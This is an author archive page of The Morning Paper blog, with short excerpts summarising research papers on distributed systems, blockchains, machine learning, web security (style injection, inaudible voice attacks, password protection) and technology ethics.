adriancolyer

Author Archives: adriancolyer

ServiceFabric: a distributed platform for building microservices in the cloud

ServiceFabric: a distributed platform for building microservices in the cloud Kakivaya et al., EuroSys’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site).

Microsoft’s Service Fabric powers many of Azure’s critical services. It’s been in development for around 15 years, in production for 10, and was made available for external use in 2015.

ServiceFabric (SF) enables application lifecycle management of scalable and reliable applications composed of microservices running at very high density on a shared pool of machines, from development to deployment to management.

Some interesting systems running on top of SF include:

  • Azure SQL DB (100K machines, 1.82M DBs containing 3.48PB of data)
  • Azure Cosmos DB (2 million cores and 100K machines)
  • Skype
  • Azure Event Hub
  • Intune
  • Azure IoT suite
  • Cortana

SF runs in multiple clusters each with 100s to many 100s of machines, totalling over 160K machines with over 2.5M cores.

Positioning & Goals

Service Fabric defies easy categorisation, but the authors describe it as “Microsoft’s platform to support microservice applications in cloud settings.” What particularly makes it stand out from the crowd Continue reading

Hyperledger fabric: a distributed operating system for permissioned blockchains

Hyperledger fabric: a distributed operating system for permissioned blockchains Androulaki et al., EuroSys’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site).

This very well written paper outlines the design of HyperLedger Fabric and the rationales for many of the key design decisions. It’s a great introduction and overview. Fabric is a permissioned blockchain system with the following key features:

  • A modular design allows many components to be pluggable, including the consensus algorithm
  • Instead of the order-execute architecture used by virtually all existing blockchain systems, Fabric uses an execute-order-validate paradigm which enables a combination of passive and active replication. (We’ll be getting into this in much more detail shortly).
  • Smart contracts can be written in any language.

…in popular deployment configurations, Fabric achieves throughput of more than 3500 tps, achieving finality with latency of a few hundred ms and scaling well to over 100 peers.

Examples of use cases powered by Fabric include foreign exchange netting in which a blockchain is used to resolve trades that aren’t settling; enterprise asset management tracking hardware assets as they move from manufacturing to Continue reading

ForkBase: an efficient storage engine for blockchain and forkable applications

ForkBase: an efficient storage engine for blockchain and forkable applications Wang et al., arXiv’18

ForkBase is a data storage system designed to support applications that need a combination of data versioning, forking, and tamper proofing. The prime example being blockchain systems, but this could also include collaborative applications such as GoogleDocs. Today for example Ethereum and HyperLedger build their data structures directly on top of a key-value store. ForkBase seeks to push these properties down into the storage layer instead:

One direct benefit is that it reduces development efforts for applications requiring any combination of these features. Another benefit is that it helps applications generalize better by providing additional features, such as efficient historical queries, at no extra cost. Finally, the storage engine can exploit performance optimization that is hard to achieve at the application layer.

Essentially what we end up with is a key-value store with native support for versioning, forking, and tamper evidence, built on top of an underlying object storage system. At the core of ForkBase is a novel index structure called a POS-Tree (pattern-oriented-split tree).

The ForkBase stack

From the bottom-up, ForkBase comprises a chunk storage layer that performs chunking and deduplication, a Continue reading

zkLedger: privacy-preserving auditing for distributed ledgers

zkLedger: privacy-preserving auditing for distributed ledgers Narula et al., NSDI’18

Somewhat similarly to Solidus that we looked at late last year, zkLedger (presumably this stands for zero-knowledge Ledger) provides transaction privacy for participants in a permissioned blockchain setting. zkLedger also has an extra trick up its sleeve: it provides rich and fully privacy-preserving auditing capabilities. Thus a number of financial institutions can collectively use a blockchain-based settlement ledger, and an auditor can measure properties such as financial leverage, asset illiquidity, counter-party risk exposures, and market concentration, either for the system as a whole, or for individual participants. It provides a cryptographically verified level of transparency that’s a step beyond anything we have today.

The goals of zkLedger are to hide the amounts, participants, and links between transactions while maintaining a verifiable transaction ledger, and for the Auditor to receive reliable answers to its queries. Specifically, zkLedger lets banks issue hidden transfer transactions which are still publicly verifiable by all other participants; every participant can confirm a transaction conserves assets and assets are only transferred with the spending bank’s authority.

Setting the stage

A zkLedger system comprises n banks and an auditor that verifies certain operational aspects of transactions Continue reading

Towards a design philosophy for interoperable blockchain systems

Towards a design philosophy for interoperable blockchain systems Hardjono et al., arXiv 2018

Once upon a time there were networks and inter-networking, which let carefully managed groups of computers talk to each other. Then with a capital “I” came the Internet, with design principles that ultimately enabled devices all over the world to interoperate. Like many other people, I have often thought about the parallels between networks and blockchains, between the Internet, and something we might call ‘the Blockchain’ (capital ‘B’). In today’s paper choice, Hardjono et al. explore this relationship, seeing what we can learn from the design principles of the Internet, and what it might take to create an interoperable blockchain infrastructure. Some of these lessons are embodied in the MIT Tradecoin project.

We argue that if blockchain technology seeks to be a fundamental component of the future global distributed network of commerce and value, then its architecture must also satisfy the same fundamental goals of the Internet architecture.

The design philosophy of the Internet

This section of the paper is a précis of ‘The design philosophy of the DARPA Internet protocols’ from SIGCOMM 1988. The top three fundamental goals for the Internet as conceived Continue reading

Measuring the tendency of CNNs to learn surface statistical regularities

Measuring the tendency of CNNs to learn surface statistical regularities Jo et al., arXiv’17

With thanks to Cris Conde for bringing this paper to my attention.

We’ve looked at quite a few adversarial attacks on deep learning systems in previous editions of The Morning Paper. I find them fascinating for what they reveal about the current limits of our understanding.

…humans are able to correctly classify the adversarial image with relative ease, whereas the CNNs predict the wrong label, usually with very high confidence. The sensitivity of high performance CNNs to adversarial examples casts serious doubt that these networks are actually learning high level abstract concepts. This begs the following question: How can a network that is not learning high level abstract concepts manage to generalize so well?

In this paper, Jo and Bengio conduct a series of careful experiments to try and discover what’s going on. The initial hypothesis runs like this:

  • There are really only two ways we could be seeing the strong generalisation performance that we do. Either (a) the networks are learning high level concepts, or (b) there may be a number of superficial cues in images that are shared across training and test datasets, Continue reading

Large-scale analysis of style injection by relative path overwrite

Large-scale analysis of style injection by relative path overwrite Arshad et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

We’ve all been fairly well trained to have good awareness of cross-site scripting (XSS) attacks. Less obvious, and also less well known, is that a similar attack is possible using style sheet injection. A good name for these attacks might be SSS: same-site style attacks.

Even though style injection may appear less serious a threat than script injection, it has been shown that it enables a range of attacks, including secret exfiltration… Our work shows that around 9% of the sites in the Alexa top 10,000 contain at least one vulnerable page, out of which more than one third can be exploited.

I’m going to break today’s write-up down into four parts:

  1. How on earth do you do secret exfiltration with a stylesheet?
  2. Injecting stylesheet content using Relative Path Overwite (RPO)
  3. Finding RPO vulnerabilities in the wild
  4. How can you defend against RPO attacks?

Secret exfiltration via stylesheets

Style sheet injection Continue reading

Unsupervised anomaly detection via variational auto-encoder for seasonal KPIs in web applications

Unsupervised anomaly detection via variational auto-encoder for seasonal KPIs in web applications Xu et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Today’s paper examines the problem of anomaly detection for web application KPIs (e.g. page views, number of orders), studied in the context of a ‘top global Internet company’ which we can reasonably assume to be Alibaba.

Among all KPIs, the most (important?) ones are business-related KPIs, which are heavily influenced by user behaviour and schedule, thus roughly have seasonal patterns occurring at regular intervals (e.g., daily and/or weekly). However, anomaly detection for these seasonal KPIs with various patterns and data quality has been a great challenge, especially without labels.

Donut is an unsupervised anomaly detection algorithm based on Variational Auto-Encoding (VAE). It uses three techniques (modified ELBO, missing data injection, and MCMC imputation), which together add up to state-of-the-art anomaly detection performance. One of the interesting findings in the research is that it is important to train on both normal data and abnormal data Continue reading

Algorithmic glass ceiling in social networks: the effects of social recommendations on network diversity

Algorithmic glass ceiling in social networks: the effects of social recommendations on network diversity Stoica et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Social networks were meant to connect us and bring us together. This paper shows that while they might be quite successful at doing this in the small, on a macro scale they’re actually doing the opposite. Not only do they reinforce and sustain disparities among groups, but they actually reinforce the rate at which disparity grows. I.e., they’re driving us apart. This happens due to the rich-get-richer phenomenon resulting from friend/follow recommendation algorithms.

… we find that prominent social recommendation algorithms can exacerbate the under-representation of certain demographic groups at the top of the social hierarchy… Our mathematical analysis demonstrates the existence of an algorithmic glass ceiling that exhibits all the properties of the metaphorical social barrier that hinders groups like women or people of colour from attaining equal representation.

Organic growth vs algorithmic growth

In the social networks now governing the knowledge, Continue reading

Pixie: a system for recommending 3+ billion items to 200+ million users in real-time

Pixie: a system for recommending 3+ billion items to 200+ million users in real-time Eksombatchai et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Pinterest is a visual catalog with several billion pins, which are visual bookmarks containing a description, a link, and an image or a video. A major problem faced at Pinterest is to provide personalized, engaging, and timely recommendations from a pool of 3+ billion items to 200+ million monthly active users.

Stating the obvious, 3 billion or so items is a lot to draw recommendations from. This paper describes how Pinterest do it. One of the requirements is that recommendations need to be calculated in real-time on-demand. I’m used to thinking about the shift from batch to real-time in terms of improved business responsiveness, more up-to-date information, continuous processing, and so on. Pinterest give another really good reason which is obvious with hindsight, but hadn’t struck me before: when you compute recommendations using a batch process, you have to calculate the recommendations for every user Continue reading

SafeKeeper: protecting web passwords using trusted execution environments

SafeKeeper: protecting web passwords using trusted execution environments Krawiecka et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Today’s paper is all about password management for password protected web sites / applications. Even if we assume that passwords are salted and hashed in accordance with best practice (NIST’s June 2017 digital identity guidelines now mandate the use of keyed one-way functions such as CMAC), an adversary that can obtain a copy of the back-end database containing the per-user salts and the hash values can still mount brute force guessing attacks against individual passwords.

SafeKeeper goes a lot further in its protection of passwords. What really stands out is the threat model. SafeKeeper keeps end user passwords safe even when we assume that an adversary has unrestricted access to the password database. Not only that, the adversary is able to modify the content sent to the user from the web site (including active content such as client-side scripts). And not only that! The adversary is also able to read all Continue reading

Semantics and complexity of GraphQL

Semantics and complexity of GraphQL Hartig & Pérez, WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

GraphQL has been gathering good momentum since Facebook open sourced it in 2015, so I was very interested to see this paper from Hartig and Pérez exploring its properties.

One of the main advantages (of GraphQL) is its ability to define precisely the data you want, replacing multiple REST requests with a single call…

One of the most interesting questions here is what if you make a public-facing GraphQL-based API (as e.g. GitHub have done), and then the data that people ask for happens to be very expensive to compute in space and time?

Here’s a simple GraphQL query to GitHub asking for the login names of the owners of the first two repositories where ‘danbri’ is an owner.

From here there are two directions we can go in to expand the set of results returned : we can increase the breadth by asking for more repositories to be considered (i.e., changing first:2 Continue reading

Re-coding Black Mirror, Part V

This is the final part of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Towards trust-based decentralized ad-hoc social networks

Koidl argues that we have ‘crisis of trust’ in social media caused which manifests in filter bubbles, fake news, and echo chambers.

  • “Filter bubbles are the result of engagement-based content filtering. The underlying principle is to show the user content that relates to the content the user has previously engaged on. The result is a content stream that lacks diversification of topics and opinions.”
  • “Echo chambers are the result of content recommendations that are based on interests of friends and peers. This results in a content feed that is strongly biased towards grouped opinion (e.g. Group Think).”
  • “Fake news, and related expressions of the same, such as alternative facts, is Continue reading

Re-coding Black Mirror Part IV

This is part IV of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Is this the era of misinformation yet? Combining social bots and fake news to deceive the masses

In 2016, the world witnessed the storming of social media by social bots spreading fake news during the US Presidential elections… researchers collected Twitter data over four weeks preceding the final ballot to estimate the magnitude of this phenomenon. Their results showed that social bots were behind 15% of all accounts and produced roughly 19% of all tweets… What would happen if social media were to get so contaminated by fake news that trustworthy information hardly reaches us anymore?

Fake news and hoaxes have been Continue reading

Re-coding Black Mirror Part III

This is part III of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Shut up and run: the never-ending quest for social fitness

In this paper we explore possible negative drawbacks in the use of wearable sensors, i.e., wearable devices used to detect different kinds of activity, e.g., from step and calories counting to heart rate and sleep monitoring.

The core of the paper consists of three explored scenarios: Alice’s insurance, Bob’s mortgage, and Charlie’s problem.

Alice is looking to buy health insurance, which requires completing a screening process with potential insurers. Company A scanned Alice’s social media, found out that her mother has diabetes, adjusted risk upwards and hence offered a costly plan beyond what Alice can afford. Company Continue reading

Re-coding Black Mirror, Part II

We’ll be looking at a couple more papers from the re-coding Black Mirror workshop today:

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Pitfalls of affective computing

It’s possible to recognise emotions from a variety of signals including facial expressions, gestures and voices, using wearables or remote sensors, and so on.

In the current paper we envision a future in which such technologies perform with high accuracy and are widespread, so that people’s emotions can typically be seen by others.

Clearly, this could potentially reveal information people do not wish to reveal. Emotions can be leaked through facial micro-expressions and body language making concealment very difficult. It could also weaken social skills if it is believed that there is no need to speak or move to convey emotions. “White lies” might become impossible, removing a person’s responsibility to be compassionate. It could also lead to physical harm:

The ability Continue reading

Re-coding Black Mirror, Part I

In looking through the WWW’18 proceedings, I came across the co-located ‘Re-coding Black Mirror’ workshop.

Re-coding Black Mirror is a full day workshop which explores how the widespread adoption of web technologies, principles and practices could lead to potential societal and ethical challenges as the ones depicted in Black Mirror‘s episodes, and how research related to those technologies could help minimise or even prevent the risks of those issues arising.

The workshop has ten short papers exploring either existing episodes, or Black Mirror-esque scenarios in which technology can go astray. As food for thought, we’ll be looking at a selection of those papers this week. In the MIT media lab, Black Mirror episodes are assigned watching for new graduate students in the Fluid Interfaces research group.

Today we’ll be looking at:

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Both papers pick Continue reading

Inaudible voice commands: the long-range attack and defense

Inaudible voice commands: the long-range attack and defense Roy et al., NSDI’18

Although you can’t hear them, I’m sure you heard about the inaudible ultrasound attacks on always-on voice-based systems such as Amazon Echo, Google Home, and Siri. This short video shows a ‘DolphinAttack’ in action:

To remain inaudible, the attack only works from close range (about 5ft). And it can work at up to about 10ft when partially audible. Things would get a whole lot more interesting if we could conduct inaudible attacks over a longer range. For example, getting all phones in a crowded area to start dialling your premium number, or targeting every device in an open plan office, or parking your car on the road and controlling all voice-enabled devices in the area. “Alexa, open my garage door…”. In today’s paper, Roy et al. show us how to significantly extend the range of inaudible voice command attacks. Their experiments are limited by the power of their amplifier, but succeed at up to 25ft (7.6m). Fortunately, the authors also demonstrate how we can construct software-only defences against the attacks.

We test our attack prototype with 984 commands to Amazon Echo and 200 commands to smartphones Continue reading

Progressive growing of GANs for improved quality, stability, and variation

Progressive growing of GANs for improved quality, stability, and variation Karras et al., ICLR’18

Let’s play “spot the celebrity”! (Not your usual #themorningpaper fodder I know, but bear with me…)

In each row, one of these is a photo of a real person, the other image is entirely created by a GAN. But which is which?

The man on the left, and the woman on the right, are both figments of a computer’s imagination.

In today’s paper, Karras et al. demonstrate a technique for producing high-resolution (e.g. 1024×1024) realistic looking images using GANs:

The key idea is to grow both the generator and discriminator progressively: starting from a low resolution, we add new layers that model increasingly fine details as training progresses. This both speeds the training up and greatly stabilizes it, allowing us to produce images of unprecedented quality.

You can find all of the code, links to plenty of generated images, and videos of image interpolation here: https://github.com/tkarras/progressive_growing_of_gans. This six-minute results video really showcases the work in a way that it’s hard to describe without seeing. Well worth the time if this topic interests you.

Progression

Recall that in a GAN setup we pitch a Continue reading

Photo-realistic single image super-resolution using a generative adversarial network

Photo-realistic single image super-resolution using a generative adversarial network Ledig et al., arXiv’16

Today’s paper choice also addresses an image-to-image translation problem, but here we’re interested in one specific challenge: super-resolution. In super-resolution we take as input a low resolution image like this:

And produce as output an estimation of a higher-resolution up-scaled version:

For the example above, here’s the ground truth hi-resolution image from which the low-res input was initially generated:

Especially challenging of course, is to recover / generate realistic looking finer texture details when super-resolving at large upscaling factors. (Look at the detail around the hat band and neckline in the above figures for example).

In this paper, we present SRGAN, a generative adversarial network (GAN) for image super-resolution (SR). To our knowledge, it is the first framework capable of inferring photo-realistic natural images for 4x upscaling factors.

In a mean-opinion score test, the scores obtained by SRGAN are closer to those of the original high-resolution images than those obtained by any other state-of-the-art method.

Here’s an example of the fine-detail SRGAN can create, even when upscaling by a factor of 4. Note how close it is to the original.

Your Loss is my GA(i)N

A Continue reading